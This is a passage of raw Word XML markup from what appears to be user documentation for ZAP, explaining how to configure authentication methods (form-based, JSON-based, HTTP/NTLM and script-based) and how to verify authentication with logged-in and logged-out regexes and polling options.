    <w:p w:rsidR="79865E96" w:rsidP="55820FFD" w:rsidRDefault="79865E96" w14:paraId="683D138B" w14:textId="74EA8E58">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After selecting the Authentication Method type, the options that need to be configured depend on the Authentication Method.</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2A39DBC9" w14:textId="4AE79FCA">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Note: Changing the authentication method after Users have been defined might cause its credentials to be reset, as the type of user credentials need to match the authentication scheme. A confirmation dialogue will be shown when that happens</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62399B51" w14:textId="71E5845D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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Manual Authentication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6335A709" w14:textId="4E119F95">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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No configuration is needed for this authentication method.</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65D632BF" w14:textId="7EB496E0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>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Form-Based Authentication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15EDF7B3" w14:textId="338C5ED9">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To configure this authentication method, you need to supply the login </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="0E732591">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</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to which the login request is performed, the request body (POST data), if needed, and </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>identify</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the parameters used to supply the 'username' and 'password'. If no request body is supplied, the login request is performed as a HTTP GET, otherwise an HTTP POST is used. The credentials themselves are configured in the Users tab. The login page can also be supplied to </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>indicate</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from where to obtain a new session (</w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e.g.</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cookies) and regenerate Anti CSRF tokens present in the request body. If the login page is not </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="7F822E67">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>supplied</w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="5BD02F47">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the login URL is used</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4F08F5F1" w14:textId="74268E23">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>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JSON-Based Authentication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0DDE0141" w14:textId="21484A8E">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To configure this authentication method, you need to supply the login </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="43A08D00">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, to which the login request is performed, the JSON object (POST data, application/</w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>json</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and </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>identify</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the parameters used to supply the 'username' and 'password'. The credentials themselves are configured in the Users tab. The login page can also be supplied to </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>indicate</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from where to obtain a new session (</w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e.g.</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cookies). If the login page is not </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="5A14A5BC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>supplied,</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it is used the login </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="4B99262F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</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56768A1E" w14:textId="70140F96">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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Examples of POST data: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3C7BE64F" w14:textId="2411A089">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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{"username":"{%username%}","password":"{%password%}"}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208A7612" w14:textId="51D4AAF8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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{"user</w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>":{</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"mail":"{%username%}","password":"{%password%}"}}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6CA2659D" w14:textId="78A31F03">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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where {%username%} and {%password%} indicate where the authentication credentials are set.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="79865E96" w:rsidP="55820FFD" w:rsidRDefault="79865E96" w14:paraId="5CA311D7" w14:textId="772F525B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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5E4176CF" w14:textId="05E1EE3A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>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HTTP/NTLM Authentication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3166CAF7" w14:textId="20451814">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To configure this authentication method, you need to supply the hostname and the port of the server the authentication is done with and the realm the credentials apply to. The credentials themselves are configured in the Users tab.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373354BD" w14:textId="7AE289A0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>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Script-Based Authentication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624CF5FE" w14:textId="5763A122">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To use this authentication method, you first need to write (and save) </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>an</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Authentication Script using the Scripts tab (see the provided examples and templates for this script type in the Scripts tab). Then you need to supply the name of the script in the dropdown list. After selecting the script, you need to press the Load button, loading all the requirements of the script. </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="2FA4E51A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Any parameters specified as required or optional in the script will be shown in the defined interface.</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Their values are available to be used in the script, during the authentication, as seen in the provided examples for Authentication Scripts. Make sure that after doing any changes to the parameters required by the Authentication script you re-load the script. Otherwise, the parameters shown in the interface might not be the ones used during the authentication and errors might occur. The credentials used for each User during the authentication processed can be also specified in the Authentication Script and are configured in the Users tab.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5F138C31" w14:textId="37CC2C78">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication Verification  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="79865E96" w:rsidP="55820FFD" w:rsidRDefault="79865E96" w14:paraId="749D38E3" w14:textId="372C2C94">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>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Verification Strategy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147EC980" w14:textId="1BDF570C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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Select the Authentication Verification Strategy required.</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301970EE" w14:textId="57040CC2">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Regex pattern used to </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>identify</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Logged in messages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5BB2CAD5" w14:textId="47C58A97">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If this regex pattern is specified and matches any string in the specified </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="19C9256B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>message,</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then ZAP will treat this message as logged in. For </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="6478BD46">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example,</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the pattern could be used to match a </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://example.com/logout</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link or the presence of a 'Welcome, User X' message.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="79865E96" w:rsidP="55820FFD" w:rsidRDefault="79865E96" w14:paraId="75026DA0" w14:textId="531934F4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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Regex pattern used to </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>identify</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Logged out messages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4EA7D8BB" w14:textId="7A94AA86">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If this regex pattern is specified and matches any string in the specified </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="6E49CA4B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>message,</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then ZAP will treat this message as logged out. For </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="1EB53281">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example,</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the pattern could be used to match a </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://example.com/login</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link or the presence of a 'Welcome, Guest' message.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4D16F806" w14:textId="05BA49A0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>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Poll Frequency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109371A2" w14:textId="3DA1BB6A">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This controls how </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>frequently</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ZAP will poll to see if a user is still authenticated. The integer will either </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>represent</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the number of Requests that will be made before ZAP </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="1DD64F93">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>polls</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again or the number of Seconds before it will poll again, depending on </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pulldown</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selected</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150CDE22" w14:textId="253A5205">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The option is only relevant if the "Poll the Specified URL" Verification Strategy has been selected</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6E35F960" w14:textId="71CA12A6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>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URL to Poll for Verification  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="79865E96" w:rsidP="55820FFD" w:rsidRDefault="79865E96" w14:paraId="095BC63B" w14:textId="74CAAC9A">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This is the URL that ZAP will poll to see if a user is still authenticated. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="79865E96" w:rsidP="55820FFD" w:rsidRDefault="79865E96" w14:paraId="0B8464FD" w14:textId="67778DC5">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The option is only relevant if the "Poll the Specified URL" Verification Strategy has been selected</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546B2E40" w14:textId="72BB3351">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>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Poll Request POST Data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03D6A580" w14:textId="6F0E19AA">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If </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="626F984F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>supplied,</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then this will be sent as a POST in the poll request. If it is </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="15AA8240">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>empty,</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then ZAP will make a GET request </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="79865E96" w:rsidP="55820FFD" w:rsidRDefault="79865E96" w14:paraId="395CE0CF" w14:textId="05EFE35C">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The option is only relevant if the "Poll the Specified URL" Verification Strategy has been selected</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215AEE6C" w14:textId="15FC931B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="55820FFD" w:rsidR="79865E96">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Additional Poll Request Headers  </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48B77522" w14:textId="484DDB3D">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An optional set of headers that will be sent with the poll request. Each line should be one header and value separated by a colon </w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="09EEB3C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e.g</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0888AC26" w14:textId="35958561">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Content-Type: application/</w:t>
      </w:r>
      <w:r w:rsidRPr="55820FFD" w:rsidR="7991910B">
        <w:rPr>
